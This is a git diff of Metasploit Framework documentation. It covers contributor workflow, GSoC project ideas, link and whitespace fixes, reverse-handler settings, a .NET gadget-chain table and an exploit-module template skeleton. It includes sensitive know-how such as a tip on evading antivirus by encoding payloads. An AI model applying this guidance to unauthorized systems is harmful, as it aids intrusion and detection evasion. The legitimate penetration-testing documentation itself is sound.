@@ -472,4 +471,4 @@ class Metasploit3 < Msf::Auxiliary
    end
  end
 end
-```
+```
@@ -6,13 +6,13 @@ whilst also avoiding some common pitfalls and learning how some of our systems w

 ## Initial Steps and Important Notes
 The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
-a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
-(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
 set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.

 ## Getting the Latest Version of Metasploit Framework
 Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
-To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
 Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
 and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.

@@ -51,13 +51,13 @@ done when the code is ready to be landed into Metasploit Framework to help make

 ## Checking for Code Errors
 Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
-all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
 from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.

 Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
-In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
-this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
-complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
 want, but it should mention RuboCop as it helps maintainers know what the commit is related to.

 As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
@@ -71,8 +71,8 @@ against your module code (if applicable), using `tools/dev/msftidy.rb <path to m
 if your module passed the tests. Try and fix any errors mentioned here.

 ## Writing Documentation
-The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
-on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
+on how to write module documentation at [[Writing Module Documentation|./Writing-Module-Documentation.md]].

 In general when writing documentation you will want to search for a similar documentation file under the `documentation`
 folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
@@ -91,15 +91,15 @@ these may be okay to ignore depending on the context. A good example is if a lin
 safely ignored.

 ## Submitting Your Changes and Opening a PR
-Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
-branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
 branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
 with `gwillcox-r7` substituted for your username.

-Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
-and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
-you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
-cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
 start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
 replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.

@@ -114,10 +114,10 @@ Compressing objects: 100% (8/8), done.
 Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
 Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
 remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
-remote: 
+remote:
 remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
 remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
-remote: 
+remote:
 To github.com:gwillcox-r7/metasploit-framework
 * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
 ```
@@ -46,13 +46,13 @@ Any user of Metasploit will tell you that they know what `LHOST` and `LPORT` mea

 A **handler** obviously needs to listen on a host/IP for the incoming connection. In cases where the `LHOST` value, for example the address that the target is able to reach, is the same as that which the host can listen on, no extra work has to be done. The `LHOST` value is used by the handler.

-However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindHost`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.
+However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting `LHOST` isn't enough. In order to listen on the appropriate interface, another setting must be used called `ReverseListenerBindAddress`. This value tells the **handler** to listen on a different interface/IP, but it doesn't change the fact that the `LHOST` value is given to the target when the **stage** is uploaded.

-In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindHost` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.
+In short, `LHOST` must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the `ReverseListenerBindAddress` value. If you're attacking something across the Internet and you specify an internal IP in `LHOST`, you're doing it wrong.

 ## LPORT

-The principles of `LHOST` and  `ReverseListenerBindHost` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.
+The principles of `LHOST` and  `ReverseListenerBindAddress` can be applied to `LPORT` and `ReverseListenerBindPort` as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the `ReverseListenerBindPort` setting.

 The classic example of this case is where an attacker wants to make use of port `443`, but rightfully doesn't want to run Metasploit as `root` just so they can directly bind to ports lower than `1024`. Instead, the set up a port forward (on their router, or using `iptables`) so that `443` forwards to `8443`, with a goal of accepting connections on that port instead.

@@ -75,4 +75,4 @@ There are a few things to check for when debugging a dead shell.

 ### Not so quick things to check

-* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. 
+* If the target is running AntiVirus there's a chance that the **stage** , for example `metsrv`, is being caught while being uploaded. `reverse_tcp` and `reverse_http` **stagers** download `metsrv` _without_ any encryption, and so the content of the DLL is visible to anything watching on the wire. `reverse_https` can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. 
@@ -12,7 +12,7 @@ compatibility of each.

 | Gadget Chain Name           | BinaryFormatter | LosFormatter | SoapFormatter |
 | --------------------------- | --------------- | ------------ | ------------- |
-| ClaimsPrincipal             | Yes             | Yes          | Yes           | 
+| ClaimsPrincipal             | Yes             | Yes          | Yes           |
 | TextFormattingRunProperties | Yes             | Yes          | Yes           |
 | TypeConfuseDelegate         | Yes             | Yes          | No            |
 | WindowsIdentity             | Yes             | Yes          | Yes           |
@@ -134,5 +134,5 @@ payloads such as Meterpreter.
 [5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
 [6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
 [7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
-[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
+[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
+[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
 | [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
 | [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
@@ -0,0 +1,61 @@
+GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
+
+Mentors: @jmartin-r7, @gwillcox-r7
+
+Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
+
+For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
+
+## Enhance Metasploit Framework
+
+### Rest API Pagination
+
+Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a [limited set of RCP commands](https://github.com/rapid7/metasploit-framework/pull/13439) however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs.
+
+Size: Large  
+Difficulty: 4/5
+
+### LDAP Capture Capabilities
+
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+
+Size: Medium  
+Difficulty: 3/5
+
+### Enhanced LDAP Query & Collection
+
+When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty: 3/5
+
+### Improving post-exploit API to be more consistent, work smoothly across session types
+
+The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
+
+ * Shell sessions do not implement the filesystem API that Meterpreter sessions have
+ * When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these.
+ * Simple commands like 'cmd_exec' are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily.
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty: Varies
+
+### Improve the web vulnerability API
+
+This would follow up on the Arachni plugin PR <https://github.com/rapid7/metasploit-framework/pull/8618> and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners.
+
+Size: Large  
+Difficulty: 4/5
+
+### Data Visualization
+
+Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.
+
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty 3/5
+
+## Submit your own
+
+If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the `#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
@@ -27,9 +27,9 @@ The Metasploit Framework has seven different rankings to indicate how reliable a

 ## Template

-If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
+If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://docs.metasploit.com/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.

-For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
+For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [[How to send an HTTP Request Using HTTPClient|./How-to-write-a-browser-exploit-using-HttpServer.md]]. If you're interested in browser exploit writing, definitely check out: [[How to write a browser exploit using BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]], etc.

 But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:

@@ -39,39 +39,39 @@ But of course, to begin, you most likely need a template to work with, and here
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
-      'Description'    => %q{
-        Say something that the user might need to know
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'Name' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '[Vendor] [Software] [Root Cause] [Vulnerability type]',
+        'Description' => %q{
+          Say something that the user might need to know
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Name' ],
+        'References' => [
          [ 'URL', '' ]
        ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'System or software version',
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
-      'Payload'        =>
-        {
+        'Payload' => {
          'BadChars' => "\x00"
        },
-      'Privileged'     => false,
-      'DisclosureDate' => "",
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def check
@@ -289,7 +289,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/msf_smb_client_test) > options

 Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/ruby_smb_client_test) > options

 Module options (exploit/windows/smb/ruby_smb_client_test):
@@ -1,6 +1,6 @@
 # Intro

-This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block).  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
+This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [[here|./Creating-Metasploit-Framework-LoginScanners.md]].  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).

 # Hashes

@@ -9,7 +9,7 @@ Many modules dump hashes from various software.  Anything from the OS: [Windows]
 ## Hash Identify Example

 In this first, simple, example we will simply show loading the library and calling its function.
-```
+```ruby
 require 'metasploit/framework/hashes/identify'
 puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
 # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
 puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
-```
+```ruby
 msf5 > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object
@@ -1,8 +1,8 @@
-Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
+Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [[download the Metasploit nightly installers|./Nightly-Installers.md]]. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.

 If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.

-Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
+Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].

 # Getting Started #

@@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g

 ## Important Dates

- GSoC Applications Open: April 4th at 1800 UTC 
+- GSoC Applications Open: April 4th at 1800 UTC
 - GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
 - Accepted applications announced: May 20th at 1800 UTC
 - Programming Starts: June 13th.
@@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
 You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.

 # Getting started
-Students interesting in GSoC, can start by reading Google's official guides.  
+Students interesting in GSoC, can start by reading Google's official guides.
 <https://developers.google.com/open-source/gsoc/help/student-advice>

 Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).

 A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution.  You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.

-A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
+A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [[here|./Contributing-to-Metasploit.md]].

 GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

@@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I

 ## Skillz

-What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. 
+What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.

 What other projects have you worked on before?


 ## Your project

-Fill in the details. What exactly do you want to accomplish? 
+Fill in the details. What exactly do you want to accomplish?

 # Past Submissions
 If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.
@@ -1,16 +1,16 @@
-The [HttpClient mixin](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
+The [HttpClient mixin](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.

 ## There are mainly two common methods you will see:

-* **[send\_request\_raw](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
- 
+* **[send\_request\_raw](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
+
 Here's a basic example of how to use `send_request_raw`:

 ```ruby
 	send_request_raw({'uri'=>'/index.php'})
 ```

-* **[send\_request\_cgi](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
+* **[send\_request\_cgi](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).



@@ -31,7 +31,7 @@ send_request_cgi({

 ## Cookies & CookieJars

-Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class. 
+Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.

 A HttpCookieJar is a collection of [HttpCookie](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie.rb). The Jar can be populated manually with it's `add` method, or automatically via the `keep_cookies` option that can be passed to [send\_request\_cgi](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/lib/msf/core/exploit/remote/http_client.rb#L385).

@@ -59,7 +59,7 @@ res = @http_client.send_request_cgi({
  }
 })
 ```
-The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests. 
+The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
 Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
@@ -136,7 +136,7 @@ register_options(
 )
 ```

